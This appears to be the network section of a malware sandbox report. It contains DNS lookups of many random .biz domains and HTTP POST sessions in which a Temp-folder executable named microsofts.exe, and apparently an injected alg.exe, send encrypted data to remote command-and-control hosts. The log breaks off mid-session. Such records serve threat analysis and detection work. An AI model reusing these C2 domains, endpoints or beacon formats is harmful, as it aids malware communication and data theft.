Oct 10, 2024 10:08:33.739558935 CEST | 192.168.2.5 | 1.1.1.1 | 0x248e | Standard query (0) | vyome.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:34.535470963 CEST | 192.168.2.5 | 1.1.1.1 | 0xb58f | Standard query (0) | yauexmxk.biz | A (IP address) | IN (0x0001) | false
Oct 10, 2024 10:08:35.391563892 CEST | 192.168.2.5 | 1.1.1.1 | 0x48c6 | Standard query (0) | iuzpxe.biz | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.956198931 CEST192.168.2.51.1.1.10xab3dStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.553425074 CEST192.168.2.51.1.1.10x66faStandard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.701648951 CEST192.168.2.51.1.1.10x9ae0Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.325243950 CEST192.168.2.51.1.1.10xf74Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.938456059 CEST192.168.2.51.1.1.10x72a9Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.884596109 CEST192.168.2.51.1.1.10x36efStandard query (0)xlfhhhm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.002825975 CEST192.168.2.51.1.1.10x57c7Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.771399021 CEST192.168.2.51.1.1.10x80b7Standard query (0)qpnczch.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.296082020 CEST192.168.2.51.1.1.10xcf22Standard query (0)ifsaia.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.660382032 CEST192.168.2.51.1.1.10x9ca0Standard query (0)brsua.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.745841980 CEST192.168.2.51.1.1.10x1584Standard query (0)saytjshyf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.902606964 CEST192.168.2.51.1.1.10xa571Standard query (0)dlynankz.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.495413065 CEST192.168.2.51.1.1.10x3d26Standard query (0)vcddkls.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.765274048 CEST192.168.2.51.1.1.10x7b53Standard query (0)oflybfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.048964024 CEST192.168.2.51.1.1.10x74dbStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.517148972 CEST192.168.2.51.1.1.10xae9bStandard query (0)yhqqc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.084662914 CEST192.168.2.51.1.1.10xc9b6Standard query (0)tbjrpv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.584666967 CEST192.168.2.51.1.1.10x127bStandard query (0)mnjmhp.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.942850113 CEST192.168.2.51.1.1.10x1370Standard query (0)deoci.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.425131083 CEST192.168.2.51.1.1.10x1741Standard query (0)gytujflc.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.073003054 CEST192.168.2.51.1.1.10x345cStandard query (0)qaynky.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.279267073 CEST192.168.2.51.1.1.10x7f19Standard query (0)opowhhece.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.115287066 CEST192.168.2.51.1.1.10x6f06Standard query (0)zjbpaao.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.126297951 CEST192.168.2.51.1.1.10x48bdStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.255410910 CEST192.168.2.51.1.1.10x48bdStandard query (0)jdhhbs.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.486633062 CEST192.168.2.51.1.1.10x99fbStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.508049965 CEST192.168.2.51.1.1.10x99fbStandard query (0)bumxkqgxu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.093257904 CEST192.168.2.51.1.1.10x7784Standard query (0)dwrqljrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.854765892 CEST192.168.2.51.1.1.10xc2e0Standard query (0)nqwjmb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.031408072 CEST192.168.2.51.1.1.10x434eStandard query (0)mgmsclkyu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.632373095 CEST192.168.2.51.1.1.10xafd2Standard query (0)ytctnunms.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.133444071 CEST192.168.2.51.1.1.10x891cStandard query (0)myups.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.514288902 CEST192.168.2.51.1.1.10x8148Standard query (0)warkcdu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.958306074 CEST192.168.2.51.1.1.10x4b20Standard query (0)oshhkdluh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.712210894 CEST192.168.2.51.1.1.10xd91cStandard query (0)yunalwv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.292406082 CEST192.168.2.51.1.1.10x1b38Standard query (0)gcedd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.365560055 CEST192.168.2.51.1.1.10xa06dStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.383003950 CEST192.168.2.51.1.1.10xa06dStandard query (0)jpskm.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:59.640188932 CEST192.168.2.51.1.1.10x9a49Standard query (0)lrxdmhrr.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.397409916 CEST192.168.2.51.1.1.10xed89Standard query (0)wllvnzb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.482611895 CEST192.168.2.51.1.1.10x58fdStandard query (0)jwkoeoqns.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.297976971 CEST192.168.2.51.1.1.10x69b8Standard query (0)xccjj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.846045971 CEST192.168.2.51.1.1.10x3543Standard query (0)gnqgo.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.219214916 CEST192.168.2.51.1.1.10xea7fStandard query (0)hehckyov.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.358275890 CEST192.168.2.51.1.1.10x659eStandard query (0)jhvzpcfg.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.862147093 CEST192.168.2.51.1.1.10xd10fStandard query (0)acwjcqqv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:03.997092009 CEST192.168.2.51.1.1.10xa194Standard query (0)rynmcq.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.565181971 CEST192.168.2.51.1.1.10xa5bStandard query (0)lejtdj.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.574513912 CEST192.168.2.51.1.1.10x4a08Standard query (0)vyome.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.117322922 CEST192.168.2.51.1.1.10xb850Standard query (0)yauexmxk.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.589631081 CEST192.168.2.51.1.1.10xf098Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.689766884 CEST192.168.2.51.1.1.10xf098Standard query (0)uaafd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.693413019 CEST192.168.2.51.1.1.10xcce5Standard query (0)iuzpxe.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.361083031 CEST192.168.2.51.1.1.10xf98fStandard query (0)sxmiywsfv.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.445163012 CEST192.168.2.51.1.1.10x30a4Standard query (0)eufxebus.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.747029066 CEST192.168.2.51.1.1.10xbf57Standard query (0)vrrazpdh.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.866389990 CEST192.168.2.51.1.1.10xdc87Standard query (0)pwlqfu.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.124671936 CEST192.168.2.51.1.1.10x9b43Standard query (0)rrqafepng.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.490029097 CEST192.168.2.51.1.1.10xeb95Standard query (0)ftxlah.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.097177029 CEST192.168.2.51.1.1.10xeaecStandard query (0)ctdtgwag.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.868161917 CEST192.168.2.51.1.1.10x96c7Standard query (0)typgfhb.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.011159897 CEST192.168.2.51.1.1.10x945dStandard query (0)tnevuluw.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.185734034 CEST192.168.2.51.1.1.10xd13dStandard query (0)whjovd.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.383723021 CEST192.168.2.51.1.1.10xa8a4Standard query (0)gjogvvpsf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.263416052 CEST192.168.2.51.1.1.10x7c5Standard query (0)esuzf.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.269483089 CEST192.168.2.51.1.1.10xec83Standard query (0)reczwga.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.303419113 CEST192.168.2.51.1.1.10xa107Standard query (0)gvijgjwkh.bizA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:35.399429083 CEST1.1.1.1192.168.2.50x48c6No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:36.963459015 CEST1.1.1.1192.168.2.50xab3dNo error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.561502934 CEST1.1.1.1192.168.2.50x66faNo error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.710150957 CEST1.1.1.1192.168.2.50x9ae0No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.332496881 CEST1.1.1.1192.168.2.50xf74No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:42.945869923 CEST1.1.1.1192.168.2.50x72a9No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:43.892818928 CEST1.1.1.1192.168.2.50x36efNo error (0)xlfhhhm.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.010734081 CEST1.1.1.1192.168.2.50x57c7No error (0)gvijgjwkh.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:44.954185009 CEST1.1.1.1192.168.2.50x80b7No error (0)qpnczch.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.304174900 CEST1.1.1.1192.168.2.50xcf22No error (0)ifsaia.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:45.667912960 CEST1.1.1.1192.168.2.50x9ca0No error (0)brsua.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.910897970 CEST1.1.1.1192.168.2.50xa571No error (0)dlynankz.biz85.214.228.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:46.942065001 CEST1.1.1.1192.168.2.50x1584No error (0)saytjshyf.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.675154924 CEST1.1.1.1192.168.2.50x3d26No error (0)vcddkls.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.772552967 CEST1.1.1.1192.168.2.50x7b53No error (0)oflybfv.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.055941105 CEST1.1.1.1192.168.2.50x74dbNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.055941105 CEST1.1.1.1192.168.2.50x74dbNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.524832010 CEST1.1.1.1192.168.2.50xae9bNo error (0)yhqqc.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.092335939 CEST1.1.1.1192.168.2.50xc9b6No error (0)tbjrpv.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.678770065 CEST1.1.1.1192.168.2.50x127bNo error (0)mnjmhp.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.950445890 CEST1.1.1.1192.168.2.50x1370No error (0)deoci.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:51.432939053 CEST1.1.1.1192.168.2.50x1741No error (0)gytujflc.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.081075907 CEST1.1.1.1192.168.2.50x345cNo error (0)qaynky.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:52.286775112 CEST1.1.1.1192.168.2.50x7f19No error (0)opowhhece.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.343812943 CEST1.1.1.1192.168.2.50x48bdNo error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.343839884 CEST1.1.1.1192.168.2.50x48bdNo error (0)jdhhbs.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.596824884 CEST1.1.1.1192.168.2.50x99fbNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:53.597018003 CEST1.1.1.1192.168.2.50x99fbNo error (0)bumxkqgxu.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.100629091 CEST1.1.1.1192.168.2.50x7784No error (0)dwrqljrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.862147093 CEST1.1.1.1192.168.2.50xc2e0No error (0)nqwjmb.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.038822889 CEST1.1.1.1192.168.2.50x434eNo error (0)mgmsclkyu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.640398026 CEST1.1.1.1192.168.2.50xafd2No error (0)ytctnunms.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.141946077 CEST1.1.1.1192.168.2.50x891cNo error (0)myups.biz165.160.13.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.141946077 CEST1.1.1.1192.168.2.50x891cNo error (0)myups.biz165.160.15.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.521702051 CEST1.1.1.1192.168.2.50x8148No error (0)warkcdu.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.965785027 CEST1.1.1.1192.168.2.50x4b20No error (0)oshhkdluh.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:57.720726967 CEST1.1.1.1192.168.2.50xd91cNo error (0)yunalwv.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.299818039 CEST1.1.1.1192.168.2.50x1b38No error (0)gcedd.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:58.628931046 CEST1.1.1.1192.168.2.50xa06dNo error (0)jpskm.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:59.647563934 CEST1.1.1.1192.168.2.50x9a49No error (0)lrxdmhrr.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.405123949 CEST1.1.1.1192.168.2.50xed89No error (0)wllvnzb.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:00.490252018 CEST1.1.1.1192.168.2.50x58fdNo error (0)jwkoeoqns.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.305067062 CEST1.1.1.1192.168.2.50x69b8No error (0)xccjj.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:01.853338957 CEST1.1.1.1192.168.2.50x3543No error (0)gnqgo.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.226409912 CEST1.1.1.1192.168.2.50xea7fNo error (0)hehckyov.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.365505934 CEST1.1.1.1192.168.2.50x659eNo error (0)jhvzpcfg.biz44.221.84.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:02.870474100 CEST1.1.1.1192.168.2.50xd10fNo error (0)acwjcqqv.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.004905939 CEST1.1.1.1192.168.2.50xa194No error (0)rynmcq.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:04.582066059 CEST1.1.1.1192.168.2.50x4a08No error (0)vyome.biz44.213.104.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.125083923 CEST1.1.1.1192.168.2.50xb850No error (0)yauexmxk.biz18.208.156.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.700743914 CEST1.1.1.1192.168.2.50xcce5No error (0)iuzpxe.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.771612883 CEST1.1.1.1192.168.2.50xf098No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:05.772023916 CEST1.1.1.1192.168.2.50xf098No error (0)uaafd.biz3.254.94.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.368706942 CEST1.1.1.1192.168.2.50xf98fNo error (0)sxmiywsfv.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:07.451927900 CEST1.1.1.1192.168.2.50x30a4No error (0)eufxebus.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.754210949 CEST1.1.1.1192.168.2.50xbf57No error (0)vrrazpdh.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:08.873372078 CEST1.1.1.1192.168.2.50xdc87No error (0)pwlqfu.biz34.246.200.160A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.132422924 CEST1.1.1.1192.168.2.50x9b43No error (0)rrqafepng.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:09.497543097 CEST1.1.1.1192.168.2.50xeb95No error (0)ftxlah.biz47.129.31.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.103873968 CEST1.1.1.1192.168.2.50xeaecNo error (0)ctdtgwag.biz3.94.10.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:10.875994921 CEST1.1.1.1192.168.2.50x96c7No error (0)typgfhb.biz13.251.16.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.019077063 CEST1.1.1.1192.168.2.50x945dNo error (0)tnevuluw.biz35.164.78.200A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.193454027 CEST1.1.1.1192.168.2.50xd13dNo error (0)whjovd.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:11.392004013 CEST1.1.1.1192.168.2.50xa8a4No error (0)gjogvvpsf.biz208.100.26.245A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.270463943 CEST1.1.1.1192.168.2.50x7c5No error (0)esuzf.biz34.211.97.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:09:12.276465893 CEST1.1.1.1192.168.2.50xec83No error (0)reczwga.biz44.221.84.105A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 54.244.188.177 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:23.741784096 CEST | 360 | OUT | POST /rurmblummdysikl HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:07:23.741784096 CEST | 828 | OUT | Data Raw: c6 bc e7 6e 35 82 a3 54 30 03 00 00 11 94 e1 3a 09 0a 6c ab 8a 82 06 bd f8 9d 94 09 35 b0 a7 38 f4 67 07 24 6a 18 18 21 23 22 75 8d d0 40 31 a6 14 4a 3e c1 7e bd 2f df ff 04 68 f2 b9 1a bd 11 e8 b1 c4 02 41 bf 13 ca cd b4 24 5f 7b 4d d5 88 a1 46
Data Ascii: n5T0:l58g$j!#"u@1J>~/hA$_{MF^ivE`S&QIBqsO1l(%kdizo2=`OxEwd@"ir,/W#3;*:<XQf=eDP<IsZ!vcs>c(J
Oct 10, 2024 10:07:24.471059084 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:07:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=7b2a5cbaabbd0fc0efd7208a65a4dc1c|8.46.123.33|1728547644|1728547644|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49707 | 18.141.10.107 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:25.144601107 CEST | 350 | OUT | POST /qmfuhtf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: ssbzmoy.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:07:25.144620895 CEST | 828 | OUT | Data Raw: 1b 90 86 93 d0 59 b3 b6 30 03 00 00 b3 dc 73 4d 29 00 66 b8 f6 cc 9e cb bf 71 ff 6c 56 db b6 a9 0e ae 87 7a c1 3b 2c b1 51 77 31 e4 bb 01 2a f4 9f 31 8f 47 57 b6 5b 31 ca 7a 11 d9 72 d4 fd d5 78 9f 9c 63 2d e9 14 f8 88 16 7a e3 b9 5e 1c a3 b8 61
Data Ascii: Y0sM)fqlVz;,Qw1*1GW[1zrxc-z^a1g4PRSP-Jr9rS#HFR9vQIMz&F-;aUS[d{46T>,v=\+?<5WF!X?=N]ve
Oct 10, 2024 10:07:26.609658957 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:07:26 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=4d09b8e0a5960d4bd1ab494c8c320a46|8.46.123.33|1728547646|1728547646|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49708 | 54.244.188.177 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:07:25.172862053 CEST | 350 | OUT | POST /mxhgf HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: pywolwnvd.biz
